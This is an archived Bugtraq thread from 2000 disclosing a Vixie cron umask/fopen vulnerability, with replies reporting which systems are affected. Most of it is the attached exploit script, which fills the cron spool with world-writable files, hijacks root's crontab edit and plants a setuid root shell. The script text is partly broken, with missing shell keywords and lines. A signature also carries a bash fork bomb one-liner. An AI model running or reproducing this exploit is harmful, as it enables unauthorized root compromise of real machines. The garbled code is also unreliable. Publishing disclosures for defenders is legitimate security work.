5738798 2000-11-17 05:41 +0100  /41 rader/ Michal Zalewski <lcamtuf@TPI.PL>
Importerad: 2000-11-17  07:24  av Brevbäraren (som är implementerad i) Python
Externa svar till: lcamtuf@TPI.PL
Mottagare: Bugtraq (import) <13781>
Ärende: vixie cron...

Attached shell-script exploits fopen() + preserved umask
vulnerability in Paul Vixie's cron code. It will work on systems
where /var/spool/cron is user-readable (eg. 0755) - AFAIR Debian does
so. RedHat (at least 6.1 and previous) have mode 0700 on
/var/spool/cron, and thus it isn't exploitable in its default
configuration... (ahmm, but this does NOT mean it is a problem of
o+rx bits, but of insecure umask() and fopen() calls).

I have no information about other distributions or systems - this
exploit should automagically detect if you are vulnerable or not
(checking /var/spool/cron, looking for Paul Vixie's crontab,
etc). Please report your findings to me and/or to BUGTRAQ.

If any of your users launched this exploit on screen, and then any
other user (including superuser) invoked "crontab -e" to change
his/her crontab entries, privledges elevation will occour. The main
attack is performed while root (or any other user, but this
particular exploit is configured against root - feel free to change
it) is editing his crontab entry. After any modification, when
crontabs are updated, this exploit will try to insert evil code over
the original contents of the crontab file (probability of successful
exploitation is near to 100%). This, after approximately one minute,
leads to account compromise.

At the beginning, this exploit is trying to abuse crontab utility in
order to create somewhat enormous number of world-writable temporary
files (these files are open with fopen(), and then rename()d to
destination name
- ugh!). It might take some time and cause less or more heavy load on
ancient boxes. After finishing it, exploit is waiting, consuming
little or no system resources, till "crontab -e" session will
appear. For more details, see exploit code.

Vendors were not notified because I have no idea which systems and
distros are shipping vulnerable configuration, and because pretty
good workaround is simple: chmod 700 /var/spool/cron.

Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(5738798) --------------------------------(Ombruten)
Bilaga (text/plain) i text 5738799
Kommentar i text 5742296 av Szilveszter Adam <sziszi@PETRA.HOS.U-SZEGED.HU>
Kommentar i text 5742617 av Dmitry Alyabyev <dimitry@AL.ORG.UA>

5738799 2000-11-17 05:41 +0100  /204 rader/ Michal Zalewski <lcamtuf@TPI.PL>
Bilagans filnamn: "xpl"
Importerad: 2000-11-17  07:24  av Brevbäraren (som är implementerad i) Python
Externa svar till: lcamtuf@TPI.PL
Mottagare: Bugtraq (import) <13782>
Bilaga (text/plain) till text 5738798
Ärende: Bilaga (xpl) till: vixie cron...

echo '.-------------------------------------------------------------------------.'
echo '| Marchew Hyperreal Industries ................... <marchew@dione.ids.pl> |'
echo "| ( ...well, it is just me, but it is more elite to speak as a group... ) |"
echo "\`--------------------------------- presents ------------------------------'"
echo '  * another vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> *   '
echo '.-------------------------------------------------------------------------.'
echo '| This time, it is somewhat more complicated. On some systems, it might   |'
echo '| require some tuning, to be slower, but resources-effective. It expects  |'
echo '| root (or other choosen user) to do "crontab -e" or "crontab /any/file"  |'
echo '| sooner or later, and spoofs the legitimate cron entry file with evil    |'
echo '| content, thus leading to account compromise (usually: root compromise). |'
echo "\`-------------------------------------------------------------------------'"


VCRON="`strings /usr/bin/crontab 2>/dev/null|grep -i vixie`"

if [ "$VCRON" = "" ]; then
  echo "[-] Sorry, this box is not running vixie cron."
  exit 1
  echo "[+] Found Paul Vixie's /usr/bin/crontab utility."

if [ -r /var/spool/cron ]; then
  echo "[+] This box has exploitable /var/spool/cron..."
  echo "[-] Sorry, this box is not vulnerable to this attack."
  exit 1

if [ -u /usr/bin/crontab ]; then
  echo "[+] This box has setuid crontab utility..."
  echo "[-] Sorry, this box has no setuid crontab."
  exit 1

cat >dowrite.c <<_EOF_
main() {
  write(1,"* * * * * /tmp/.rootcron\n\n",26);

echo "[+] Compiling helper application #1..."

gcc -o dowrite dowrite.c 

if [ ! -f dowrite ]; then
  echo "[-] Compilation failed."
  exit 1

echo "[+] Application #1 compiled successfully."

echo "[+] Creating helper application #2..."

cat >/tmp/.rootcron <<_EOF_

  chown root.root /tmp/.r00tcr0n
  chmod 6755 /tmp/.r00tcr0n
  rm -f /var/spool/cron/tmp.*
  crontab -r
) &>/dev/null


cat >root.c <<_EOF_
main() {
  setuid(0); setgid(0);

echo "[+] Compiling helper application #3..."

gcc -o /tmp/.r00tcr0n root.c

if [ ! -f /tmp/.r00tcr0n ]; then
  echo "[-] Compilation failed."
  exit 1

echo "[+] Application #3 compiled successfully."


if [ ! "$1" = "noprep" ]; then

  echo "[*] Attack against user $DESTUSER, doing $CYCLES setup cycles..."
  echo "    Please be patient, setup might took some time; to skip it if"
  echo "    /var/spool/cron on this machine is already initialized, use"
  echo "    '$0 noprep'."

  test "$PROB" -gt "100" && PROB=100

  echo "[+] This gives almost $PROB% probability of success on the
first attempt."

  while [ "$X" -lt "$CYCLES" ]; do
    echo -ne "\r[?] Doing cycle $X of $CYCLES [$[X*100/CYCLES]% done]... "
    umask 0
    ( ( crontab /dev/urandom & usleep 1000; killall crontab ) & ) &>/dev/null 

  sleep 3;killall -9 crontab &>/dev/null

  echo echo "[+] Setup complete, /var/spool/cron filled with junk tmp


  echo "[*] Now, doing cleanup and counting the nodes..."

  for i in 1 2 3 4 5 6 7 8 9; do
    for j in /var/spool/cron/tmp.${i}*; do
      echo -n >$j
      echo -ne "\r[+] Node $CNT clean... "



  echo "[+] Found $CNT nodes, approx. $PROB% chance..."

  if [ "$CNT" -lt "$[CYCLES*2/3]" ]; then
    echo "[-] Less than 66% of expected nodes were created. Try adjusting the exploit."
    exit 1


  echo "[?] Skipping /var/spool/cron initialization. Results might be


echo "[+] Now I will wait for $DESTUSER to edit his crontab. Could
take some time."

chmod 755 /tmp/.rootcron

while :; do
  sleep 1
  GOT="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep|cut -b10-15|head -1`"
  test "$GOT" = "" && continue
  GOT=`echo $GOT`
  echo "[+] Caught victim at pid $GOT..."
  if [ ! -f /var/spool/cron/tmp.$GOT ]; then
    echo "[-] DAMN! We have no node for this pid, bad luck..."
  echo '[+] Got this node :) Entering event wait loop...'
  export DESTUSER
     while [ ! "$G" = "" ]; do
       G="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep`"
     sleep 1
     echo "[+] Bingo! It happened. Now writing our evil content..." 1>&2
  ) >/var/spool/cron/tmp.$GOT
  echo '* * * * * /bin/true' >.ctab
  echo "[+] Evil content written. Trying to rehash the daemon..."
  crontab .ctab
  crontab -r
  echo "[+] Entering event loop waiting for exploit to work..."
  while [ ! -u /tmp/.r00tcr0n ]; do
    sleep 1
  rm -f .ctab dowrite dowrite.c /tmp/.rootcron root.c
  echo "[+] Calling the main code..."
  echo "[*] Thank you for choosing Marchew Industries."
  exit 1
(5738799) --------------------------------(Ombruten)

5742296 2000-11-17 11:14 +0100  /41 rader/ Szilveszter Adam <sziszi@PETRA.HOS.U-SZEGED.HU>
Importerad: 2000-11-17  18:31  av Brevbäraren (som är implementerad i) Python
Externa svar till: sziszi@PETRA.HOS.U-SZEGED.HU
Mottagare: Bugtraq (import) <13785>
Kommentar till text 5738798 av Michal Zalewski <lcamtuf@TPI.PL>
Ärende: Re: vixie cron...
From: Szilveszter Adam <sziszi@PETRA.HOS.U-SZEGED.HU>
Message-ID: <20001117111438.C29176@petra.hos.u-szeged.hu>

On Fri, Nov 17, 2000 at 05:41:32AM +0100, Michal Zalewski wrote:
> Attached shell-script exploits fopen() + preserved umask vulnerability in
> Paul Vixie's cron code. It will work on systems where /var/spool/cron is
> user-readable (eg. 0755) - AFAIR Debian does so. RedHat (at least 6.1 and
> previous) have mode 0700 on /var/spool/cron, and thus it isn't exploitable
> in its default configuration... (ahmm, but this does NOT mean it is a
> problem of o+rx bits, but of insecure umask() and fopen() calls).
> I have no information about other distributions or systems - this exploit
> should automagically detect if you are vulnerable or not (checking
> /var/spool/cron, looking for Paul Vixie's crontab, etc). Please report
> your findings to me and/or to BUGTRAQ.

Hello everybody!

Upon testing and inspection of the CVS repository, I have found that
FreeBSD 2.1.x, 2.2.x, 3.x, 4.x and -CURRENT are not vulnerable to
this exploit if it is launched by normal users, since the /var/cron
directory is 0750 by default. Members of the wheel group may still
launch it successfully, though. If this is a big risk in itself can
be debated.

Note1: The script will not work by default on FreeBSD, because here
/bin/sh is *not* bash, bash is not even installed by
default. Directory location is also different. This in itself does
not mean much though:-)

Note2: I do not speak for the FreeBSD Security Officer, but just
wanted to let you know fast.


Szilveszter ADAM
Szeged University
Szeged Hungary
(5742296) --------------------------------(Ombruten)

5742617 2000-11-17 11:30 +0200  /27 rader/ Dmitry Alyabyev <dimitry@AL.ORG.UA>
Importerad: 2000-11-17  19:50  av Brevbäraren (som är implementerad i) Python
Externa svar till: dimitry@al.org.ua
Mottagare: Bugtraq (import) <13789>
Kommentar till text 5738798 av Michal Zalewski <lcamtuf@TPI.PL>
Ärende: Re: vixie cron...
From: Dmitry Alyabyev <dimitry@AL.ORG.UA>
Message-ID: <30243104766.20001117113004@al.org.ua>


Friday, November 17, 2000, 6:41:32 AM, Michal wrote:

> Attached shell-script exploits fopen() + preserved umask vulnerability in
> Paul Vixie's cron code. It will work on systems where /var/spool/cron is
> user-readable (eg. 0755) - AFAIR Debian does so. RedHat (at least 6.1 and
> previous) have mode 0700 on /var/spool/cron, and thus it isn't exploitable
> in its default configuration... (ahmm, but this does NOT mean it is a
> problem of o+rx bits, but of insecure umask() and fopen() calls).

> I have no information about other distributions or systems - this exploit
> should automagically detect if you are vulnerable or not (checking
> /var/spool/cron, looking for Paul Vixie's crontab, etc). Please report
> your findings to me and/or to BUGTRAQ.

Slackware 7.0 is not exploitable (not vixie's cron) Mandrake 7.0 is
not exploitable (on the reason of permissions on /var/spool/cron)

(5742617) --------------------------------(Ombruten)

5742290 2000-11-17 18:12 +0100  /43 rader/ Michal Zalewski <lcamtuf@TPI.PL>
Importerad: 2000-11-17  18:30  av Brevbäraren (som är implementerad i) Python
Externa svar till: lcamtuf@TPI.PL
Mottagare: Bugtraq (import) <13784>
Ärende: Re: vixie cron...
From: Michal Zalewski <lcamtuf@TPI.PL>
Message-ID: <Pine.LNX.4.10.10011171747130.751-100000@localhost>

In order to summarize the responses I've received:


- Debian 2.2 is vulnerable; this exploit might need slight
  modifications in order to work properly (eg. /var/spool/cron/crontabs,
  which is 0755 as well, has to be used instead of /var/spool/cron)

- systems where vixie-cron has been installed manually seems to be
  vulnerable (this will include Solaris etc - but this exploit
  won't work or will require some modifications); well, general
  conditions are: o+x on /var/spool/cron and setuid vixie crontab.

- I still have no informations about other non RH-derived distributions
  and other systems shipping vixie-cron, but I would suspect at least
  part of them (if you have something to add, feel free to mail me),

Not vulnerable:

- most of RedHat-derived systems are not vulnerable (this includes
  Mandrake, Cobalt Linux and *probably* Corel Linux); Trustix is
  not vulnerable,

- Slackware is not using vixie-cron, of course (but have dangerous
  permissions, if you have replaced default cron with vixie, expect

- FreeBSD seems to be not vulnerable (other permissions).

That's it for now. I would like to thanks all the people who replied
to my mail - Dmitry Alyabyev, Mariusz Woloszyn, Ethan Benson, Oystein
Viggen, Szilveszter Adam, dbaseiv, Simple Nomad and Daniel Jacobowitz

Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(5742290) --------------------------------(Ombruten)